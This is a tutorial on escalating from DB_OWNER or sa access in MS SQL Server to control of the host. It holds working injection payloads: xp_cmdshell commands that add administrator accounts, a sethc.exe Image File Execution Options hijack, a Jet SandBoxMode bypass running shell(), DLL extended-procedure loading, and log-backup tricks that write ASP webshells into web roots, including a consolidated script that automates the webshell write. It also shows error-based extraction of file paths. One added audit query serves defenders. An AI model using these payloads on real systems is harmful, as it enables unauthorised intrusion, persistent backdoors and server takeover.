Summary of DB_OWNER or sa Privilege Escalation (MS SQL Server)

Source: Internet
Author: User

1. (listing directories)
-------------------------------
Exec master..xp_cmdshell 'ver'
On most servers xp_cmdshell cannot be used, and many people give up at this step.
There is also the component problem: the Internet is full of tutorials on restoring the component, but a restored component is not necessarily usable either.
The idea below is to use xp_dirtree to list directories.
The startup-item backup in section 2 needs no component at all, so it works against any DB server.
Exec master..xp_dirtree 'c:\',1,1    (second argument: depth, third: include files)

2. (backup startup item)
-------------------------------
/* Back up a one-line script or a .bat via the URL or SQL Query Analyzer using the transaction log */
Alter database [master] set recovery full --
Create table cmd (a image)--
Backup log [master] to disk='c:\cmd1' with init --
Insert into cmd (a) values (0x...)--
Backup log [master] to disk='C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\start.bat' --
Drop table cmd --
Write whatever .bat script you need, convert it to HEX and substitute it for the insert value.
start.bat under C:\Documents and Settings\Administrator\Start Menu\Programs\Startup runs the next time the administrator logs on to the server.
3. (create the sp_readTextFile stored procedure)
-------------------------------
Create proc sp_readTextFile @filename sysname
As
Begin
Set nocount on
Create table #tempfile (line varchar(8000))
Exec ('bulk insert #tempfile from "' + @filename + '"')
Select * from #tempfile
Drop table #tempfile
End
Go

Exec sp_readTextFile 'c:\windows\system32\eula.txt'
BULK INSERT reads the file as the SQL Server service account and needs the bulkadmin or sysadmin role, so this only works at sa level.

4. (image hijacking)
-------------------------------
Exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
With this key in place, pressing Shift five times at the logon screen launches cmd.exe (running as SYSTEM) instead of Sticky Keys.

5. (privilege escalation in sa sandbox mode)
-------------------------------
1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--

2. Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user itpro gmasfm /add")');

Setting SandBoxMode to 0 lets the Jet engine evaluate VBA functions such as shell() inside a query; ias.mdb is simply an .mdb present on Windows 2000/2003 installs that the provider can open. OpenRowSet itself requires Ad Hoc Distributed Queries to be enabled.

Log backup to shell

Select name from master.dbo.sysdatabases

Use pubs
Alter database pubs set recovery full --
Create table cmd2 (a image)--
Backup log pubs to disk='c:\Snapshot22' with init --
Insert into cmd2 (a) values ('<%eval request("#")%>')--
Backup log pubs to disk='C:\Ue48\m.asp' --
Drop table cmd2 --
Alter database pubs set recovery simple --

6. (add a custom extended stored procedure)
-------------------------------
DLL placed at C:\Ue48\xplake2.dll

Sp_addextendedproc 'xp_lake2','C:\Ue48\xplake2.dll'
EXEC xp_lake2 'net user x$ x /add'
EXEC xp_lake2 'net localgroup administrators x$ /add'
Sp_dropextendedproc 'xp_lake2'
sp_addextendedproc is sysadmin-only, and the DLL is loaded into the SQL Server process itself, so it runs with the service account's rights.
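The following audit query is an added example for defenders, not code from the original page. It shows, on SQL Server 2005 or later, whether the primitives used in sections 1, 5 and 6 are reachable on an instance: the xp_cmdshell and Ad Hoc Distributed Queries switches, the Jet SandBoxMode value, any DLL-backed extended procedures a user registered, and which logins hold sysadmin. The registry path is the one section 5 writes; nothing else is assumed about the host.

```sql
-- Added audit example (not from the original page). Run as sysadmin.

-- 1. Server options behind sections 1 and 5 (value_in_use = 1 means enabled).
select name, value_in_use
from sys.configurations
where name in (N'xp_cmdshell',                 -- section 1: OS commands
               N'Ad Hoc Distributed Queries',  -- section 5: OPENROWSET to Jet
               N'Ole Automation Procedures',   -- sp_OA* object creation
               N'show advanced options')
order by name

-- 2. Jet sandbox mode (section 5 sets this to 0). Default on a hardened host is 3;
--    a 0 here means shell() inside a Jet query is allowed.
exec master..xp_regread N'HKEY_LOCAL_MACHINE',
                        N'SOFTWARE\Microsoft\Jet\4.0\Engines',
                        N'SandBoxMode'

-- 3. User-registered extended procedures (section 6). sys.extended_procedures
--    lists objects of type X created with sp_addextendedproc together with the
--    DLL they load; a normal instance has none, so every row deserves a look.
select name, dll_name, create_date
from sys.extended_procedures
order by create_date desc

-- 4. Who can do all of the above: every login that is a member of sysadmin.
--    (db_owner only maps to dbo inside one database, which is all that
--    user_name() = 'dbo' proves; is_srvrolemember checks the server role.)
select sp.name as login_name, sp.type_desc
from sys.server_principals sp
where sp.type in ('S', 'U', 'G')
  and is_srvrolemember(N'sysadmin', sp.name) = 1
order by sp.name
```

Section 3 and 4 results are the ones worth alerting on: a non-empty sys.extended_procedures or a SandBoxMode of 0 has no legitimate reason to appear on a production database server.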

7. (manual log backup steps)
-------------------------------
1. Switch the current database to the full recovery model
; Alter database [current database] set recovery full --
2. Create a table cmd
; Create table cmd (a image)--
3. Back up the current database log to D:\cmd1
; Backup log [current database] to disk='D:\cmd1' with init --
4. Insert the one-line shell into the created table cmd
; Insert into cmd (a) values ('<%execute(request("a"))%>')--
   (when sent through a URL both % signs must be URL-encoded as %25)
5. Back up the one-liner into the site root directory
; Backup log [current database] to disk='D:\www_web\oct.asp' --
6. Finish
; Drop table cmd --
--------------------------------
sa permission: create an administrator user

1. Check whether injection exists: and 1=1 / and 1=2
; and user_name()='dbo' -- tests whether the connection runs as dbo. This is true for sa (sa maps to dbo in every database) but also for a login that merely owns this one database, so and is_srvrolemember('sysadmin')=1 is the stricter test for sa.

2. Add a system administrator
; Exec master.dbo.xp_cmdshell 'net user wk wk90 /add';--
; Exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--

8. (DB_OWNER permission: log backup of a dedicated one-line trojan)
--------------------------------
Adding Response.End after the one-liner changes one thing: everything that follows the inserted statement in the backed-up file is ignored, so the page the webshell returns is smaller.
Log backup to WEBSHELL, the standard steps:

1. InjectionURL'; alter database XXX set recovery full -- (set the database to the FULL RECOVERY model)

2. InjectionURL'; create table cmd (a image)-- (create the cmd table)

3. InjectionURL'; backup log XXX to disk='C:\cmd' with init -- (flush the log so the final backup file is small)

4. InjectionURL'; insert into cmd (a) values (0x...)-- (insert the one-liner into the table as hexadecimal characters)

5. declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\hsqq.asp' backup database @a to disk=@s with differential,FORMAT -- performs a DIFFERENTIAL backup of the database; the path is provisionally the C: directory above with the file name hsqq.asp

6. drop table cmd -- delete the table.

Both the log backup and the differential backup need an existing full backup of the database as their base; without one SQL Server refuses with "there is no current database backup", and switching the recovery model from SIMPLE to FULL also resets the log chain.
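The script below is an added example, not code from the original page: it is the log-backup file write that sections 2, 5, 7 and 8 each spell out as separate statements, rewritten as one T-SQL batch that first checks the two preconditions those sections leave implicit (recovery model, and a full backup as the base of the log chain) and takes the full backup only when it is missing. The staging path C:\cmd1, the target path C:\Ue48\m.asp and the base backup path C:\base.bak are assumptions; the payload bytes are the page's own <%eval request("#")%> one-liner, hex-encoded so the injected string needs no quotes.

```sql
-- Added example (not from the original page). Requires db_owner on the current
-- database; every path below is an assumption.
declare @db sysname, @stage nvarchar(260), @target nvarchar(260),
        @was_simple bit, @need_base bit
select @db = db_name(),
       @stage  = N'C:\cmd1',        -- throwaway log backup (assumed path)
       @target = N'C:\Ue48\m.asp',  -- file to create on disk (assumed path)
       @was_simple = 0, @need_base = 0

-- 1. BACKUP LOG only works in the FULL (or BULK_LOGGED) recovery model, and
--    leaving SIMPLE resets the log chain, so a new base backup is then required.
if databasepropertyex(@db, 'Recovery') = 'SIMPLE'
begin
    exec ('alter database [' + @db + '] set recovery full')
    select @was_simple = 1, @need_base = 1
end

-- 2. A log backup also needs a full database backup as its base (msg 4214
--    otherwise). msdb records every backup taken, so look there first.
if @need_base = 0 and not exists (select 1 from msdb.dbo.backupset
                                  where database_name = @db and type = 'D')
    set @need_base = 1
if @need_base = 1
    exec ('backup database [' + @db + '] to disk = N''C:\base.bak'' with init')

-- 3. Flush the pending log so the final file stays small.
exec ('backup log [' + @db + '] to disk = N''' + @stage + ''' with init')

-- 4. Stage the payload in a logged insert.
--    0x3C25... is the byte string of: <%eval request("#")%>
create table cmd (a image)
insert into cmd (a) values (0x3C256576616C20726571756573742822232229253E)

-- 5. The next log backup carries those bytes (surrounded by log page noise)
--    into the target file; IIS only executes what sits between <% and %>.
exec ('backup log [' + @db + '] to disk = N''' + @target + '''')

-- 6. Clean up, and put the recovery model back only if this batch changed it.
drop table cmd
if @was_simple = 1
    exec ('alter database [' + @db + '] set recovery simple')
```

BACKUP writes the file as the SQL Server service account, so the target directory has to be writable by that account, not by the injecting user; and the resulting file is binary log data with the one-liner embedded, which is why the page suggests a Response.End to cut the returned page short.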

Code for reading the website's physical path:

1. drop table [jm_tmp]; create table [jm_tmp] (value nvarchar(4000) null, data nvarchar(4000) null) -- create the table

2. delete [jm_tmp]; insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/' -- insert the website root directory into the table

3. and (select top 1 cast([data] as nvarchar(4000))+char(124) from [jm_tmp] order by [data] desc)=0 -- output the field: the comparison with 0 forces an nvarchar-to-int conversion that fails, and the error message carries the value

4. drop table [jm_tmp] -- delete the table.

Code for reading a disk directory:

1. drop table [jm_tmp]; create table [jm_tmp] (subdirectory nvarchar(400) NULL, depth tinyint NULL, [file] bit NULL) -- create the table

2. delete [jm_tmp]; insert [jm_tmp] exec master..xp_dirtree 'C:\',1,1 -- insert the folders and files of drive C into the table (the table has three columns, so both the depth and the include-files arguments are required)

3. and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) from (select top 1 [subdirectory],[file] from [jm_tmp] order by [file],[subdirectory]) T order by [file] desc,[subdirectory] desc) -- returns the name of the first folder

4. and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) from (select top 2 [subdirectory],[file] from [jm_tmp] order by [file],[subdirectory]) T order by [file] desc,[subdirectory] desc) -- returns the name of the second folder

5. and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) from (select top X [subdirectory],[file] from [jm_tmp] order by [file],[subdirectory]) T order by [file] desc,[subdirectory] desc) -- returns the X-th folder or file name

6. drop table [jm_tmp] -- delete the table.

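The following block is an added example, not the page's own code, showing why the nested TOP N / reversed ORDER BY form used in both the directory-reading and the site-path steps returns exactly one chosen row, and how the value escapes through a conversion error. The sample rows are constructed here to stand in for the output of xp_dirtree 'C:\',1,1, so it runs without any injection or registry access; on SQL Server 2000 the error text reads "Syntax error converting the nvarchar value ..." rather than "Conversion failed ...".

```sql
-- Added example (not from the original page): the error-based row picker.
create table #jm_tmp (subdirectory nvarchar(400) null, depth tinyint null, [file] bit null)

-- Constructed rows in place of: insert #jm_tmp exec master..xp_dirtree 'C:\',1,1
insert #jm_tmp values (N'WINDOWS', 1, 0)
insert #jm_tmp values (N'Inetpub', 1, 0)
insert #jm_tmp values (N'boot.ini', 1, 1)
insert #jm_tmp values (N'Program Files', 1, 0)

-- The ascending order by ([file], [subdirectory]) that the page's X index walks:
-- folders ([file] = 0) first, then files, each group alphabetically.
--   1 Inetpub | 2 Program Files | 3 WINDOWS | 4 boot.ini
select subdirectory, [file] from #jm_tmp order by [file], [subdirectory]

-- The page's "Top X" form with X = 2 (any X from 1 to the row count works).
-- Inner query: the first 2 rows in ascending order. Outer query: the last of
-- those, i.e. exactly row 2. Appending char(124) ('|') yields a string that
-- cannot be converted to int, so the comparison with 1 raises error 245 and
-- the message reveals the row:
--   Conversion failed when converting the nvarchar value 'Program Files|0|' to data type int.
select 1 where 1 = (
    select top 1 cast([subdirectory] as nvarchar(400)) + char(124)
                 + cast([file] as nvarchar(1)) + char(124)
    from (select top 2 [subdirectory], [file]
          from #jm_tmp
          order by [file], [subdirectory]) T
    order by [file] desc, [subdirectory] desc)

drop table #jm_tmp
```

The site-path read works the same way with a single column: `cast([data] as nvarchar(4000)) + char(124)` compared against 0. The trailing char(124) is there so that a value that happens to be numeric (a folder named 123, say) still fails the conversion instead of silently comparing equal.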

DB_OWNER permission during injection when the web server and the database are not on the same host

Even when the database and the web server sit on different machines there is still a chance; it does not mean there is none. Was IIS installed along with the operating system? List the C: drive and check for an Inetpub directory; then you know whether IIS is installed. But what if you do not know the web server's IP address? You can ping the web server and scan port 1433 across that C-class range to see which host answers. This method is not good, though: many hosts now run a firewall, so even an open port 1433 will not show up in a scan. What then? You can use opend
